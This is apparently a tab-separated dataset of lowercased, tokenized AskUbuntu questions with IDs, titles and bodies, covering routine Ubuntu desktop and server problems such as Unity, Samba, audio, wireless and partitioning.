33309	how do i delete album tags in multiple files ?	i have multiple tracks where i would like to delete the album entry . if i mark them in rhythmbox and try to edit their tags , i can only change it to something else . if i leave the field empty , it does not change anything at all . how can i void these fields ?
33310	how to make a window normal size with the keyboard in unity ?	i have 10.10 netbook edition ( with unity ) . if i hold down the super key , i see numbers on the the app icons ( including apps that are already open ) . if i hit the number for an app that is already open ( say firefox ) , it opens all my firefox windows in a small version . at this point i can actually interact with the small versions of the firefox windows and use alt-tab to switch between them . but what if i want to select one of the firefox windows to be normal size ? i know i can click on it to do that , but how do i do it with the keyboard .
33311	can i get paid apps access in 10.04lts ?	i do n't see any option on my software center ! i do not know if it is relevant , but i have created an ubuntu one account ( although i do n't know how to inform the os about it ) .
33315	how to reset wireless card settings	yesterday i was playing around of the wireless settings , and set up a tftp server . today , i found the wireless icon does not show up on the panel anymore.. monitor and bluetooth are still there ... i did : ifconfig -a , and it shows : etho0 link encap : ethernet , and it has : hwaddress inet6 addresss . rxbytes 0 tx bytes : 0 , but it does not even have a ip4 address , nor a mask . the other one is : l0 link encap : local loopback inet addr 127.0.0.1. mask 2550 0 0 can anyone help me how to reset the settings for my wireless connection ? thanks
33319	why does my laptop give a loud beep everytime i unplug from ac power ?	this used to happen only if i do it before ubuntu was fully loaded or if it was just waking from a suspend , but now it started happening always . my laptop is acer aspire 5740 . can the os suppress this beep ?
33320	how can i remove the shadows from the unity panel ?	last update brought shadows to the unity panel - or at least i just noticed them . i know that i can remove any shadows i want through the window decoration plugin in ccsm but grabbing the panel does n't give me its name . so , what do i have to add to the shadow windows rule to remove the unity panel shadows ?
33323	how can i change the google chrome webapp icon ?	so i 've got the askubuntu chatroom ( i 'm just using this as an example , i 've got other webapps that i 've got the same issue with ) saved as a `` application shortcut '' in chromium , and the icon is really ( and i mean really ) low resolution . example : the top one is the default icon that 's used for the application shortcut , the bottom is the askubuntu lens - so my question is , how can i use the icon that 's used for the askubuntu lens .
33328	how can i limit disk space usage for one user ?	like.. user john123 , you can only use 100mb of my harddisk . user jake155 , you can only use 250mb of my harddisk .
33330	can i get the firefox 4 button icons from windows xp to display in ubuntu ?	the firefox 4 icons that display in windows xp ( e.g. , back button , refresh button , home button ) are really nice . is there a way to get these icons and use them in my ubuntu firefox 4 installation ? the firefox 4 icons used in windows xp : http : //img707.imageshack.us/i/firefox4iconsfromwindow.jpg/
33334	smbclient -m send message problem	i would like to send message to the network pc ( ubuntu also ) . command on myself ( to send message to me , just for test ) : smbclient -m myname -b error is : message start : errsrv - errmsgoff ( not receiving messages . ) command on remote machine : smbclient -m remotename -b error is : connection to remotename failed . error nt_status_bad_network_name myname and remotename are hostname values . is i right ? thanks for help
33349	how can i stream my soundcard output ?	i want to stream the output of my sound card to my ipod , via http server . the goal is to use my hifi as loud speakers for my computer , using my ipod , wireless . ( nb . i want to stream everything to my hifi ( games , music ... ) , so streaming files is not a solution ) i tried a lot of things with vlc , but none of them were successful . i tried a few inputs for vlc , but i could n't figure out how to refer to my soundcard alsa : // alsa : //hw:0,0 alsa : //pulse ( works , but it 's the microphone , and not the soundcard ) v4l2 : // -- v4l-adev= '' /dev/dsp '' ( my computer does not have /dev/dsp ) v4l2 : // -- v4l-adev= '' /dev/snd '' -- alsadev -- alsadev= '' hw:0,0 '' -- v4l2-standard alsa : // -- alsadev= '' hw:0,0 '' thanks
33359	app for viewing photos with properties ( exif ) display ?	i 'm looking for an app to view photos in folders , which can display properties ( like time taken ) next to photo . i want to view photos in folders as they are , without importing them to some library like in shotwell or digikam . what would you recommend ?
33369	partitioning to enable dual boot windows 7 and ubuntu reinstall	i have decided to shrink my hdd by 30gb to facilitate a win 7 and 11.04 dual boot . the 30gb partition will sort of be my permanent ubuntu partition . my question is when installing 11.04 on the 28th , how many sub-partitions are needed in the 30gb to enable a reinstall if the need arises ( swap , ubuntu data & settings ) ? should the 30gb be primary or logical ? i have 4gb ram how much swap size is needed ? please help a newbie who simply loves ubuntu !
33378	firefox becomes default browser after upgrade . can not revert to google chrome	upgraded my notebook to natty beta 1 two days ago . all seems to be in order except for a very annoying little thing . i used to have google chrome as my default browser , and after the upgrade , this default was changed to firefox . note that when i go to the google chrome settings and to the firefox setting it seems that google chrome is set as my default browser , but whenever i click on a url from outside a browser it 's firefox that comes up and not chrome . any help will be much appreciated . thanks .
33384	how can i see the monodevelop patch in bug # 606470	https : //bugs.launchpad.net/dbusmenu/+bug/606470/comments/3 shows a patch which fixes the missing unity menu workaround . i 'd like to see what this patch does so i can apply it to my md trunk build ( and maybe make a pull request upstream ) . is there a way i can browse this diff in launchpad ? i think i really want an easy way to find revision 2.4+dfsg-3ubuntu2 in whatever source tree holds ubuntu monodevelop packages update : i found this : https : //launchpad.net/ubuntu/natty/+source/monodevelop update : i finally found this : http : //bazaar.launchpad.net/~ubuntu-branches/ubuntu/natty/monodevelop/natty/revision/53 ? start_revid=53 monodevelop.in just gets used to generate the menu entry . i 'd like a more general solution , like dynamic menu support from libappmenu .
33385	how does gnome know where to categorize & place shortcuts in the gnome menu ?	coming from a windows background , i 'm used to being able to access global start menu shortcuts and user specific shortcuts in file explorer , but the gnome menu has me puzzled . when i navigate the menu by clicking the ubuntu button at the top left ( the equivalent of the start button on windows ) , i can see all the application shortcuts are categorized according to what type of application they are . but when i look at the shortcuts from where they 're actually being read from ( /usr/share/applications ) , they all appear in one big folder with no indication of how ubuntu/gnome is categorizing them into their own unique categories . how does this work ? i 'd like to be able to easily modify where shortcuts are located/appearing in the menu , as well as have the ability to easily add new shortcuts and manually categorize where they should go . is this possible ?
33392	how to use the webcam 's microphone in skype ?	i 'd like to use my camera 's microfone to chat within skype . in my systemwide sound options , i have two entries in the equipment tab : one duplex for the internal soundcard and one input for the camera . though , i am unable to get the camera 's entry listed on the `` input '' tab . does anyone know how should i proceed in order to use my camera 's microphone ? thanks , pedro
33398	application with output similar to the gui output of `` wireshark ''	i know that wireshark allows live packet capturing as well as details being displayable in the gui . is there any similar program that operates on a cli , rather than a gui ? this is intended for use on a server install , in which only cli is available ( and also where disk space is limited , so much that the dependencies for the wireshark packages can not be installed ( i.e . the packages for the gui ) .
33405	creating tun device for ipsec	is it possible to create a separate device ( like tun made by openvpn ) for ipsec ? if yes how can i do it ?
33406	how can i make rhythmbox start playing a radio stream as i log on ?	i want to have rhythmbox start playing a radio stream as soon as i log in . i 've tried to run various programs in /usr , including bashnee.desktop , but to no avail .
33408	how can i improve my start-up time	hey , i 've loaded ubuntu on an older laptop and while it loads faster than windows used to i 'd like it to load even faster . are there any strategies for improving the time from power-on to the login screen ?
33411	how can i install pandoc version 1.8.1.1 ?	i am having trouble getting a installing version 1.8.1.1 of pandoc . the repository has version 1.5.1.1 , and the 1.8.1.1 tar.gz does not come with clear instructions for installation . i have also tried the recommendation from the pandoc page : sudo apt-get install cabal cabal update cabal install pandoc and pandoc is installed in ~/.cabal/lib/pandoc-1.8.1.1/ although man pandoc returns man : ca n't resolve /usr/share/man/man1/pandoc.1.gz : no such file or directory no manual entry for pandoc any assistance appreciated
33413	how to create a meta-package that automatically installs other packages ?	i 'd like to be able to create a package that doesnt contain any code or programs itself , but instead installs other packages that exist in the repositories onto a computer , sort of how the ubuntu-restricted-extras package does ?
33415	can i arrange the categories in unity 's dash ?	i would like to know if dash supports rearranging the categories that appear when one starts writing something . to be more precise , i would like whatever appears from the ask ubuntu lens to be below the actual applications ( for example if i write gedit , the application should be on top and the questions about it below ) the way it is now creates a rather `` important '' problem : since some time is needed to search askubuntu and return the answer , dash keeps changing sizes every time i press a new letter - making it impossible for me to hit the one i want . edit : in case anyone has n't noticed , the latest update has fixed the problem , putting applications on top of custom lenses .
33416	how do i disable the boot splash screen , and only show kernel and boot text instead ?	i 'd like to be able to disable the ubuntu splash screen that i see on boot with the indicator meter of progress , and replace that with a text-only readout of the boot up process ( such as you can get by hitting the esc key during the splash screen ) . is this possible ? i am not asking to disable x and get to text-only login , i '' m asking how to deactivate the `` ubuntu '' loading screen with the dots , so that i can see text output from the boot process - processes being started , kernel messages , etc . when i wrote this question i was not asking how to disable x altogether , only the boot splash screen .
33421	give ftp users access to directories outside their root using symlinks	i tried to give proftpd virtual users access to directories outside their home paths using symlinks i created as root through the console . /var/ftp/users/test is the home of the user named test . /var/ftp/files/documents is the directory that holds the documents , and /var/ftp/users/test/documents is the symlink that points to it . but when an user connects to the ftp and tries to follow the symlink , he only sees this error : documents : no such file or directory what am i doing wrong ?
33437	new menu in unity panel	i just rebooted my computer , and now i have this menu on my unity panel when no windows have focus . i have nautilus-elementary installed , and when i go to `` about '' in this menu it brings up a splash-info-thing for nautilus-elementary , leading me to believe that nautilus-elementary put it there . here is a quick video : http : //vid.ly/0t1s3j am i insane and this has been around the entire time ? is there a way to remove this ? i have n't decided if i like it yet , but right now it seems redundant .
33440	tab completion does n't work for commands	i am trying to use tab completion for commands in ubuntu 11.04 beta 1 , running all the latest updates , but it does n't seem to work . ( though package bash-completion is installed ) tab completion works correctly only for directories or files . any ideas where to dig ?
33445	flash player for 11.04 64bit	how do install adobe flash player for my 64 bit 11.04 ? also is it stable yet ?
33448	software center error : package indexes are changed	i want to download softwares from ubuntu software center , but all the time i am getting this error message : the package indexes are currently changed by apt-get . please , suggest me what to do .
33453	does the `` sync locally ? '' option in ubuntu one , mean that it just uploads to the server ?	i 'm currently running ubuntu 11.04 beta 1 and was looking at the ubuntu one client . there is an option to `` sync locally ? '' for my cloud folders . so , i 'm wondering if this means that if it 's not ticked then the folder is uploaded to the cloud server , but if i make changes somewhere else it wo n't be merged with the documents on this computer . or , does it mean that the folder wo n't be uploaded to my ubuntu one at all ? thanks ,
33457	always be 100 % bright when i 'm using battery	when i 'm using battery only - ubuntu turns in some mode , when if i do not use my pc for about 5-10 seconds - the screeen becomes darker . where do turn this option off ? because i often need to read ( without pressing keys and moving my mouse ) and i ca n't see with dark screen .
33460	hp probook 4720s - fans running constantly at full	i was given a hp probook 4720s as a work laptop , over the last 2 years i 've predominantly used ubuntu as my os for work and home , but recently have needed to use windows 7 as it controls the fans correctly . i am now at the point where i want to try and resolve this issue . i have n't asked a question before for help as i can nearly always fulfill my queries with a search engine . so here are the outputs from lspci/lsusb/lsmod not sure what is required so it 's a starting point and also a link to the hardware from hardinfo . hardinfo output , lspci output , lsusb and lsmod it has been suggested to me that ubuntu one sync daemon could have been the issue but i 've tried quitting this to no avail , i have also tried using the cpu demand frequency to it 's lowest setting 933mhz but the fans still keep going . /proc/acpi/fan is totally empty which i am guessing is that the fan has n't been detected . the sensors program detects temperatures but does not detect the speed of the fans . andy @ lappy : /proc/acpi/fan $ sensors acpitz-virtual-0 adapter : virtual device temp1 : +56.0°c ( crit = +127.0°c ) temp2 : +0.0°c ( crit = +128.0°c ) temp3 : +0.0°c ( crit = +128.0°c ) temp4 : +38.0°c ( crit = +127.0°c ) temp5 : +0.0°c ( crit = +128.0°c ) temp6 : +27.0°c ( crit = +128.0°c ) temp7 : +64.0°c ( crit = +128.0°c ) temp8 : +46.0°c ( crit = +128.0°c ) temp9 : +51.0°c ( crit = +128.0°c ) temp10 : +59.0°c ( crit = +128.0°c ) andy @ lappy : /proc/acpi/fan $ acpitool -f fan : not available i 'm guessing it 's an acpi issue but from lack of good results / google foo i can not find a solution . i have tried a few fixes from the ubuntu forums which i am failing to find links for at the moment but none of them have been useful yet . just to add this happened from a clean install so no unruly processes as mentioned in other posts . open to try just about anything , i will reinstall if i need to .
33461	how can i make ultracopier handle cut-copy-paste function in nautilus ?	i want ultracopier to manage the copy instead of nautilus . when i open nautilus , select a file or folder ctrl + c ( or x ) , open another folder then ctrl + v , i want this : instead of this : homepage
33462	ca n't play wmv files on amarok and dragon player	i can play mp3 files with amarok . but when i try to play a wmv file amarok crashes . dragon player ca n't also play them . i am looking for the audio , video codecs of wmv for amarok and dragon player . is there any ?
33464	why is the version of transmission not the most recent ?	why is in natty old version of transmission 2.13 ? current version in 2.22 released on march 4th .
33466	how can i change theme properties of selected unfocused items , they 're difficult to read	i like the default ambiance theme but i spend a lot of time within eclipse and there are portions that are unusable . the attached screenshot shows one example of this problem . i tried using parasite to identify the widget class to modify but it is n't special , just gtktreeview . so i 'm hoping i just do n't know the magic theme incantations . i 'm trying to make selected `` unfocused '' tree items have black text . example
33469	ca n't browse samba share , get a `` can not retrieve share list from server '' error	i 'm having a lot of issues with samba and trying to connect it up with a myworldbook nas drive . running maverick i have the samba 2:3.5.4 package installed that the distro came loaded with . i can see the windows network and see mybookworld attached . i click on it , it says it 's opening , then hangs , and brings up `` can not retrieve share list from server . i 've tried to browse on other computers , mac and w7 , and it works fine . if anyone can lend a hand or some advice i would truly appreciate it . i had samba working in lucid and it would work , so i 'm scratching my head on this one .
33471	gnome panels not visible	sometimes , when logging into my pc , some or all of my gnome panels fail to appear , so i 'm left with a blank screen and no way to log out/shutdown or run any programs . why have n't the panels appeared ? how can i get them back ? i can sometimes create a new panel and add a new launcher to it to reboot , but it 's a bit of a long winded solution . i 'm using the 10.04 lts release .
33472	using update manager to upgrade from ubuntu 8 to 10.04 lts leaves me with 'kernel panic '	i recently used the update manager to upgrade my laptop from ubuntu 8 to 10.04 lts . when i tried to reboot after the upgrade was complete , i got the message kernel panic not syncing : vfs : unable to mount root fs on unknown block . if i try to boot into recovery mode , i get the same problem . i have browsed the forum and seen many similar problems and some suggested solutions , but before i try any of them i want to be sure that i wo n't be making things worse . i can access all of the files on my disc by booting through an ubuntu live cd , but i 'm not sure what i should be trying to repair . any suggestions ?
33473	how can i get a complete list of non-standard repositories in use ?	while doing some support audits i 'd like to know what would be the most efficient/compact way to get a list of all extra reporitories being used on a given ubuntu workstation using command line ( not via the gui tools ) . so far i am using : diff'ing a standard sources.list file against the workstation's examining files under cat /etc/apt/sources.list.d any other ideas on how to best go about this ?
33479	dwa-160 and ar9170usb - random disconnects	has anyone ever managed to make a dwa-160 , or for that matter any usb wireless that relies on this driver , work without random disconnections that force you to reboot in order to regain access to your card ?
33480	how do i navigate to a samba location i 've mounted in nautilus on the command line ?	please note : i am two weeks old in linux . i have found a lot of answers to this question on the internet , tried many , but all failed one way or another . therefore i dare to ask once again in the hope that someone here could explain it simply : ) pre-conditions : in my institute , we have a samba server . in windows , it is accessed by going to \\xyz.220.131.233\ and entering the login abc and the password def . in ubuntu , i was able to do exactly the same using nautilus , pressing ctrl+l and entering smb : //xyz.220.131.233/ . it then asks for the login and the password and connects . i can even drag a folder from here to the 'places ' and have a shortcut to the remote location . so far so good . i 've just installed matlab and want to open this remote location . trying to cd to smb : //xyz.220.131.233/ returns can not cd to smb : //xyz.220.131.233 ( name is nonexistent or not a directory ) . a mac user in my group told me i first mount the location , but he did n't know how to do it . is it true and how do i do it ?
33482	printer queue for epson sx115	i have an epson sx115 . it used to work fine until i unplugged it and moved it upstairs . when i plug it back in even if i delete it from the printer list and re-install it every time i go to print i get a queue and no action from the printer ? ! ?
33483	ubuntu server : weird terminal	one of the ubuntu 10.10 servers present a weird terminal upon logon . it is n't bash . even backspace does a weird thing . i have to manually enter bash to get my good old bash shell back . the server was installed from the stock cd and does n't have any gui . i am curious what kind of shell is that and how do i make bash a default shell . thanks .
33491	read a multipage tiff ?	i 'm trying to sort out how to open a multi-page tiff . the sender swears it has more than one page , but in the default viewer i 'm only able to see the first page . how do i view all pages ?
33498	audio problem on some flash videos	i 'm running ubuntu 10.10 on my 64-bit laptop , and i have adobe flash 10,2,161,22 installed . the vast majority of the time , i 've no problems with flash videos in terms of both video and audio . but sometimes , i 'm having problems with sound . here 's a random example . for this one , the first two seconds are fine , but after that , when the interview starts , i can only hear 'squeaks ' , which i 'm guessing is some kind of distortion of the actual sound . there 's absolutely no problem with the video throughout . the problem occurs both for firefox and google chrome , the two browsers installed on my computer . do i need to install some special audio codec ? i could n't find anything about this by searching on the web . thanks !
33499	should i use no-script ?	i hear that web-browsing is the most likely origin of malware on a computer these days . i also hear that one does n't need to worry about viruses on linux . so , should i use a browser extension that allows me to selectively enable javascript for favoured domains , such as no-script or not-script ?
33501	how to make this heart ( âľ ) using keyboard ?	on windows i have always used the `` alt+3 '' for creating a wonderful heart for expressing my love ... is there a way to do this on ubuntu ?
33503	how do i remove wifi functionality ?	i have wifi on my 10.04 machine , but i have no use for it . this command will disable it on startup /usr/bin/dbus-send -- system -- type=method_call \ -- dest=org.freedesktop.networkmanager /org/freedesktop \ /networkmanager org.freedesktop.dbus.properties.set \ string : org.freedesktop.networkmanager \ string : wirelessenabled variant : boolean : false however , when the machine wakes up from suspend , the wifi comes back on . i have tried to put the above command in a script in /etc/pm/sleep.d but this does n't work .
33507	should i force enable hardware acceleration in the browser ?	neither firefox nor chromium have hardware acceleration enabled by default right now . firefox 4 has an option its registry to force it : layers.acceleration.force.enabled , which is by default set to false . having passed all but 3 of 800 tests run by the grafx bot , i thought it reasonable to set the above registry entry to true . however i get a terrible score in the fps test at the mozilla hardware acceleration stress test . but it does n't seem to give any problems in normal usage . similarly gpu acceleration can be enabled in chromium 10 by navigating to about : flags and checking the option . so , should i enable it or not ?
33509	how do i build qt static libraries ?	i 'm developing qt and i want to know how to build static libraries . well , i searched a lot . but the reason i asked is that i 've installed these from synaptic : libqt4-core libqt4-gui libqt4-qt3support libqt4-sql qt4-designer qt4-dev-tools qt4-qtconfig thanks for answering .
33512	chromium wakes up 300 times a second	if i 've got a gmail tab open and nothing else , running powertop shows wakeups-from-idle per second : 414.5 interval : 30.0s no acpi power usage estimate available top causes for wakeups : 61.9 % ( 1023.8 ) chromium-browse is this bad and if so what can i do ?
33514	function keys in apple keyboard do n't work as expected	i am using an apple keyboard . to get the default functionality of the function keys , i need to press fn+function key . this is quite annoying since i frequently use the function keys for debugging . is there any way i can get the default functionality out of the function keys , i.e. , get the effect of pressing the fn key without having to actually press it ?
33516	is there a 64 bit deb for crossover impersonator ?	hi i just read about crossover linux crossover impersonator and wanted to try it out , however i read there is only a 32bit version . how can i run this on my 64 bit ubuntu 11.04 ? thanks in advance
33517	what is the difference between the sync to vblank settings in compiz and nvidia x server ?	both compizconfig and the nvidia x server settings have options to enable sync to vblank . by enabling the benchmark option in compiz i can see that ticking `` enable sync to vblank '' under general in compiz will keep the frames to 30 per second . unticked , it is about 60 . however , choosing the equivalent option in the opengl tab of nvidia x settings does n't seem to have any effect . which option ( s ) should i enable ?
33521	hotot direct messaging issue	everytime i dm ( direct message ) , it gets posted in the public timeline as well . is there a solution ? i 'm using hotot 0.9.6 .
33522	is there a way to install md5 without using apt-get ?	is there a way to install md5 in ubuntu without using apt-get ?
33527	how do i install and use python 2.6 ?	i use ubuntu 8.04 as i have to use gcc 4.2 . i tried to download python 2.6 using apt-get , but the package is not available . is there any way to use python 2.6 in ubuntu 8.04 ?
33528	how do i write raw bytes to a sound-device ?	in the olden days , you used to be able to open /dev/dsp for reading and writing , now , with pulseaudio this does n't work anymore . i thought you could do it with padsp , but this code does n't run : import ossaudiodev f = ossaudiodev.open ( `` w '' ) fmt , channels , rate = dsp.setparameters ( fmt , channels , rate ) ( running it via padsp python script.py ) the error i get is no such file or directory : '/dev/dsp ' . what am i missing ? how do i read and write raw bytes from and to a sound device , and how do i select which one i want to use ?
33530	/usr/lib/apt/methods/http eating my bandwidth !	i 've noticed ( using nethogs ) , that /usr/lib/apt/methods/http has multiple processes , which consume all of my bandwidth . i want to disable the process ( es ) . i 've tried everything : trickle , killall , etc. , but nothing has worked . how can i solve this problem ?
33531	ca n't boot , get message : ... terminated with status 127	boot fails with the following message : /etc/default/locale : 5 : d_fmt : not found init : mountall main process ( 234 ) terminated with status 127 if i boot to recovery , is there any way to edit this locale file or to delete it and replace it with a default one ? how can i edit the locale file to fix this problem without being able to boot ?
33538	webcam not recognized on my sony vaio vgn-cr363 laptop	when i open cheese it says no device found . and i 've also tried changing the gstreamer properties my lsusb http : //pastebin.com/bx6b4wpe my lspci http : //pastebin.com/fzmsetst i 've also tried ricoh drivers..but i 'm not sure whether i installed them correctly ...
33539	windows list ( alt+tab ) is not centered after disconnecting from external monitor	i 'm using a laptop and connecting it to an external monitor . after disconnecting from the external monitor , the list of windows ( pressing and holding alt+tab ) is not centered . it is located in a place as if the external monitor is still connected ( bottom right instead of center ) has anyone else experienced this ? how can i fix it ? if it helps , i have a macbook pro 6,2 and the nvidia driver .
33544	intel hdmi audio out does n't show up in sound preferences	update : audio out over hdmi was detected correctly and works fine after installing ubuntu . the original question is below , but i 'm now more interested in why it worked after the install but not the live cd . is this a bug i should file ? i 'm running the ubuntu maverick live cd to make sure all the hardware on my laptop works before installing . the one problem i have is with hdmi audio out . after i plug in the hdmi cable ( or boot with it plugged in ) , i go to system > preferences > sound under the `` hardware '' tab , i can select `` digital stereo ( hdmi ) output '' , but then the only entry under the `` output '' tab is `` dummy output . '' i do n't hear any sound out of the tv speakers , and if i press `` test speakers , '' the sound dialog crashes . here 's the output of aplay -l ubuntu @ ubuntu : ~ $ aplay -l **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : alc269 analog [ alc269 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 1 : alc269 digital [ alc269 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 3 : intel hdmi 0 [ intel hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 how can i get hdmi audio output to work ?
33545	why does n't preferred applications include an image application ?	you can use `` preferred applications '' to set your media player , web browser , etc , but why does it not provide an option for images ? you can use ubuntu tweak to set the image viewer for all of the different image types , but it would be nice to have it built into ubuntu . is there a technical limitation ? ( if it 's possible with various audio/video types , i do n't see what makes images more difficult . ) or is it just a too much to do and not enough resources problem ?
33546	how to resolve dependencies when compiling a software from source	what are the best tools for resolving unmet dependencies when compiling from source ? i read about 'apt-file ' and 'checkinstall ' from ubuntu documentation however i just ca n't seem to install these two ( 2 ) packages in the terminal with sudo apt-get install command or through synaptic package manager or software centre . thanks in advance
33548	is there some way of repairing/installing ubuntu-desktop from a .deb file ?	hiya - i think my desktop is trashed . nautilus is gone , and when i try to boot to ubuntu i either get a never-ending login loop , or a black screen with only a mouse-pointer . i think i need to reinstall ubuntu-desktop for ubuntu 9.10 - dual-booting with windows under grub2 . although i can connect to a lan , and can apt-get update ( i think ) , when i try to apt-get install , it gives the following messages , after about 20 minutes of waiting for headers etc . so i 'm figuring if i can just download a .deb file , and install that , i 'll be getting somewhere . any ideas ?
33551	should n't unity 's dash 's `` find files '' find files that i have n't used yet ?	searching for files in dash brings up all the files i have used but none of those i have n't used yet . should n't it show all files with the title i search for instead of just the ones i have already used ?
33553	why do n't installation codec updates and ubuntu restricted extras include the libdvdcss files ?	i think it 's pretty strange that they 're not included . this is one thing that will scare new users away .
33554	is there a way to access session menu with keyboard shortcut ?	i have read this answer will unity have a keyboard shortcut for accessing the `` session menu '' that appears on the panel ? , but it does n't work . pressing f10 and using arrow keys only navigates me through the application 's panel menu . i can find no way to access the session menu or other indicator menus with the keyboard . is there a keyboard shortcut for accessing the session menu so that i can shutdown and log off without using the mouse ?
33561	does novell 's mono promote bloat in programs ?	is mono and/or mono-based software bloatware ? eg : banshee , moonlight , docky , tomboy notes , etc . is there anything actually wrong with software using mono and/or mono itself , or is it nothing more than an ethics issue ?
33564	how well-supported is the canon canoscan lide110 ?	on the list of supported sane devices the scanner is listed as fully supported but it says : resolution from 75 to 2400 dpi here is a link to newegg 's item listing , where it lists the optical resolution as : 2400 x 4800dpi i 'm a bit confused here - is sane 's support not up to the full potential of the scanner ? am i reading this wrong or is the list just not specifying enough information to me ?
33566	how to prevent a file under user folder to be deleted ?	how can i make some file impossible to be deleted by user even if it is under his/her home folder ?
33568	stuck while installing the os	ubuntu install frozen at checking system components , are there commands that must be typed in or incompatible hardware ? i have a phenom i x4 and an ati 4850 basically it 's a modified dx 4200-09 from gateway . reasons for installation , needed the open video editor .
33574	how can i test to see if my touchpad is supports more than 2 finger gestures ?	i 'd like to use some of the unity multitouch features . i know my touchpad supports 2 finger gestures since it scrolls when i 2 finger drag on the touchpad . how can i test to see if my touchpad supports three and four finger gestures ? all the hardware documentation just mentions that the touchpad is multitouch and does n't specify how many fingers it support . it 's a thinkpad x120e and this is what dmesg says : [ 14.821482 ] synaptics touchpad , model : 1 , fw : 7.5 , id : 0x1e0b1 , caps : 0xd000b3/0x340000/0xa0400 [ 14.821498 ] serio : synaptics pass-through port at isa0060/serio4/input0 [ 14.864676 ] input : synps/2 synaptics touchpad as /devices/platform/i8042/serio4/input/input7
33583	remote application in ubuntu ?	i am using ubuntu for development . and i want to test my application on ie . so , instead of remote desktop i want to access ie as remote application from other windows machine . so the other guy whose working on windows machine can continue with his work and i can also test my application . are there any ways to access ie as remote application between windows and ubuntu ?
33588	resize the icons in the home dash ?	why are the icons too huge ? i am using the desktop version and mouse is accurate enough to hit small targets . is it an intended design ?
33592	how do i join a windows active directory ?	we have a `` mix-mode '' lab . and we want to migrate to ubuntu , from windows . in this process , how do we add ubuntu workstations to a windows domain / active directory ( 'ad ' ) setup ?
33593	how can i either free up enough space on root or resize my partitions ?	i 'll start my saying that although i 've used ubuntu for a number of years i 've rarely taken the time to explore linux under the hood . i 've been content to rely on gui tools for most of my needs , only resorting to a terminal when a suitable gui tool could not be found . a few weeks back i did a default install of the zentyal ( ebox ) distro and set up an email server for a school . unfortunately , the default file system configuration allocated only three partitions : / - 6gb swap - 4gb /home - 96gb after being in operation for only a few weeks the root parition has filled and has taken the server to its knees . so i need to find a way to either resize or free up space in the root partition . i 've been able to figure out that the space hog is /var , the file system was setup using lvm and that both / and /home are in the same volume group . i 've attempted booting from a live cd so i could shrink /home and enlarge / . i 'm more comfortable with gui tools so i used system-config-lvm . the odd thing is that from the live cd it showed the /home partition ( or volume or whatever its called ) as not having a file system at all . when i log in normally i can see that it is in fact using ext4 . this server is running as a vmware guest so i made a snapshot and went ahead and tried to resize . everything appeared to resize without error however , after rebooting i was informed that /home could no longer be mounted . the only account that needs the /home folder is the server administrator ( me ) but apparently zentyal must use it for something because i could n't access zentyal 's web interface and the server was n't receiving any emails . so i reverted to the snapshot i had taken and here i sit . no closer to solving this problem than i was before . any help would be appreciated .
33605	can i move the unity launcher ?	i can’t get used to the new unity system . i’d like to move the left unity panel to the bottom of screen ( like windows 7 – more similar is better ) . but i ca n't find a way . is it possible ?
33608	minimal server installation	i am currently running ubuntu server 10.10 through a virtual machine to use as a stack for web development and a chance to get to grips with the ubuntu command line , however i 'd really like to set up a clean , minimal install with only the bare minimum of core utilities so i can get only what i need as i go along . the ubuntu server iso seems to install a lot of extras already and i 'd prefer just the bare minimum so i can spend more time aquainting myself with the installation and set up of the packages i need . can i obtain an image that does this ?
33612	application for watching online tv	is there a desktop application that is able to browse and play online tv channels ( similar to browser extensions like chrome tv ) ? i found democracy player , but there are no channels . the application should support many channel from all world and be able to choose by categories or countries . thank you
33614	why do firefox and thunderbird not use notify osd ?	firefox has been the default browser for ages . thunderbird is a very popular e-mail client under consideration for being included as default in the future . notify osd has been around for years now . what went wrong that in that long timeframe such important applications do not have such an important and visible feature implemented ? this is very inconsistent . when will we see it integrated ?
33617	cli screenshot/streaming screen	is there any way how i can make a screenshot of cli command `` screen -r '' , then save it as .txt ? and set it up as cron job so i can stream my `` screen -r '' command ? is there any way how i can stream my `` screen -r '' command ? i know how to set up cronjob .
33622	hp probook 4310s quick launch keyboard sensor wi-fi button gone crazy- blinking	i have a problem with quick launch keyboard buttons on hp probook 4310s and ubuntu 10.10 . actually , with one button- wi-fi on/off in windows everything works fine , but in ubuntu every time i turn to network and make some actions ( e.g. , it 's happening while i 'm writing this message ) this button goes crazy . it starts blinking . if i just read the page-it doesn’t blink . there are no pop-up messages like “wi-fi connected/wi-fi disconnected/wi-fi conn…” . but network connection blinks in the company of the button . if i try xev , the event tester doesn’t show anything-it seems i do n't push it . if i try to make a new action in keyboard shortcut settings- it does n't see i push this button in a hope to change it 's assignment . despite of this the button works . sometimes , when it 's not blinking i can push it and it changes it 's colour- so , somehow it works . how can i configure this button or the whole panel ? or what driver i must install manually ?
33623	kill the notification area so i can use the awn-notification-area ?	this is what i get when i try to start an awn-notification-area applet in unity : there is already another notification area running on this screen ! please remove the existing notification area and then restart the applet . so which process should be killed ?
33626	how do i find all files in a folder recursively by the specific name and rename them ?	i have a tree of folders . some of them contain file named `` .file.php '' how do i rename all the files with this name recursively in the tree to `` .file1.php '' ? i 'm on debian server .
33633	how can i fix unity crashing to plain graphics without rebooting ?	i 'm on maverick and every once in a while unity crashes and restarts . which is perfectly acceptable since it does n't happen to often and i assume there 's some bug they are working on for the next version . though once in a while it crashes to some sort of horrible looking graphics which reminds me of ugly looking java applications . is there some way i can restart unity with the real graphics ? restarting x is n't technically rebooting ( but it might as well be ) , it solved the graphics but since you get into an empty window it was n't really what i wanted : sudo /etc/init.d/gdm restart
33635	how to change the resolution of my desktop ?	in my monitor preferences , the maximum resolution is 1024x768 . but i still want to increase the system resolution ( to for e.g . 1600x900 or 1440x900 ) .
33636	how can i setup ldap client authentication ?	i have set up an openldap server on server 1 ( running 10.04 desktop ) per https : //help.ubuntu.com/community/openldapserver and confirmed that it worked by using ldap tools to query the ldap directory . i was also able to configure an opensuse desktop to use this server for ldap client authentication . i now want to set up server 2 ( running 10.10 desktop ) for ldap client authentication . i have followed the instructions at https : //help.ubuntu.com/community/ldapclientauthentication but authentication is not working . it acknowledges that server 1 is there , but silently fails when i attempt to log in .
